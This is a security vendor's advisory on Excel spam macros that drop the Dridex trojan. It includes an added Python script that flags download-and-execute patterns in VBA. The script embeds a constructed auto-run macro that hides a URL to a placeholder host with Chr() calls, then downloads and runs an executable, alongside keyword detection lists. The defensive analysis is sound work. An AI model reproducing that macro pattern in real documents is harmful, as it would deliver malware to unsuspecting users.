Malicious Microsoft Office macros downloading the Dridex trojan

January 12, 2015

The Dell SonicWALL Threats team has recently come across a scam that lures victims into enabling macros in a Microsoft Office attachment; once enabled, the malicious macros download the Dridex trojan.

Infection Cycle:

The threat arrives as a spam email with subjects such as

The attachment is an Excel workbook (attachment.XLS, detected as GAV: Downloader.DA) containing the malicious macros. When opened it appears blank and tells the user that macros must be enabled to see the document. Office disables macros by default, which is exactly why the lure exists: the attacker needs the victim to turn them on.

Once macros are enabled, the user still sees no content: the workbook has three empty tabs named with Russian (Cyrillic) characters.

In the background, the macro establishes an HTTP connection to the download server

It then downloads the executable LNUDTUFLKOJ.exe (detected as GAV: Dridex.VVPT), the Dridex payload.
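The infection chain above is the classic macro-downloader pattern: an auto-run trigger, an HTTP fetch, a file written to disk, and a Shell call to execute it. As an added example (not SonicWall's code and not the macro from the analysed attachment), the following Python script triages VBA source for exactly that pattern. It first folds Chr() calls and "&" string concatenation, a common way of hiding the download URL, back into plain literals, then reports which keyword families are present. The sample macro, the hostname example.invalid and the verdict thresholds are constructed for this example; the VBA source itself would normally be pulled out of the .xls with a tool such as olevba from oletools.

```python
"""Static triage of VBA macro source for the download-and-execute pattern."""
import re

# Keyword families, matched case-insensitively (VBA is case-insensitive).
AUTOEXEC = ["Auto_Open", "AutoOpen", "Workbook_Open", "Document_Open",
            "Auto_Close", "AutoExec"]
NETWORK = ["MSXML2.XMLHTTP", "MSXML2.ServerXMLHTTP", "WinHttp.WinHttpRequest",
           "URLDownloadToFile", "ADODB.Stream"]
EXECUTION = ["Shell", "WScript.Shell", "ShellExecute", "CreateProcess"]

_CHR = re.compile(r"Chr[W$]?\(\s*(\d+)\s*\)", re.I)
# "a" & "b", optionally split across a VBA line continuation ("_")
_CONCAT = re.compile(r'"([^"\n]*)"\s*&\s*_?\s*"([^"\n]*)"')
_URL = re.compile(r"""https?://[^\s"']+""")

# Constructed sample modelled on the behaviour described in the write-up.
# It is NOT the macro from the real attachment; example.invalid is a placeholder.
SAMPLE_VBA = r'''
' constructed sample for illustration only
Private Sub Workbook_Open()
    Dim u As String, p As String
    u = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & "//" & _
        "example.invalid/" & "LNUDTUFLKOJ.exe"
    p = Environ("TEMP") & "\" & "LNUDTUFLKOJ.exe"
    Set h = CreateObject("MSXML2.XMLHTTP")
    h.Open "GET", u, False
    h.Send
    Set s = CreateObject("ADODB.Stream")
    s.Type = 1
    s.Open
    s.Write h.responseBody
    s.SaveToFile p, 2
    Shell p, vbHide
End Sub
'''


def decode_chr(vba):
    """Fold Chr()/ChrW() calls and '&' concatenations into single string
    literals so keywords and URLs assembled piecewise become visible."""
    def _chr(m):
        code = int(m.group(1))
        # Leave double quotes and non-printables alone: they would need VBA
        # escaping and do not occur in the strings this check cares about.
        if 32 <= code < 127 and code != 34:
            return '"%s"' % chr(code)
        return m.group(0)
    text = _CHR.sub(_chr, vba)
    while True:  # repeat until no adjacent literal pair is left to merge
        folded = _CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), text)
        if folded == text:
            return text
        text = folded


def _hits(keywords, text):
    """Return the keywords that occur as whole words in text (case-insensitive)."""
    return [k for k in keywords
            if re.search(r"\b%s\b" % re.escape(k), text, re.I)]


def analyze(vba):
    """Decode the source, classify the indicators found and rate the macro."""
    decoded = decode_chr(vba)
    autoexec = _hits(AUTOEXEC, decoded)
    network = _hits(NETWORK, decoded)
    execution = _hits(EXECUTION, decoded)
    urls = _URL.findall(decoded)
    if autoexec and network and execution:
        verdict = "high"      # runs on open, fetches, executes: the downloader pattern
    elif autoexec and (network or execution):
        verdict = "medium"
    elif network or execution:
        verdict = "low"
    else:
        verdict = "none"
    return {"autoexec": autoexec, "network": network, "execution": execution,
            "urls": urls, "verdict": verdict, "decoded": decoded}


if __name__ == "__main__":
    report = analyze(SAMPLE_VBA)
    for key in ("verdict", "autoexec", "network", "execution", "urls"):
        print("%-10s %s" % (key, report[key]))
```

Keyword lists like these are a triage aid, not a verdict: a macro that builds its COM object names at runtime or uses other primitives will score lower than it deserves, so the decoded source is returned too for a human to read.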

Once running, the trojan harvests information from the victim's machine and posts it to its remote Command & Control servers.

The decrypted POST message is as follows:

The Dell SonicWALL Threats team urges users not to fall for these scams. SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Downloader.DA (Trojan)
  • GAV: Dridex.VVPT (Trojan)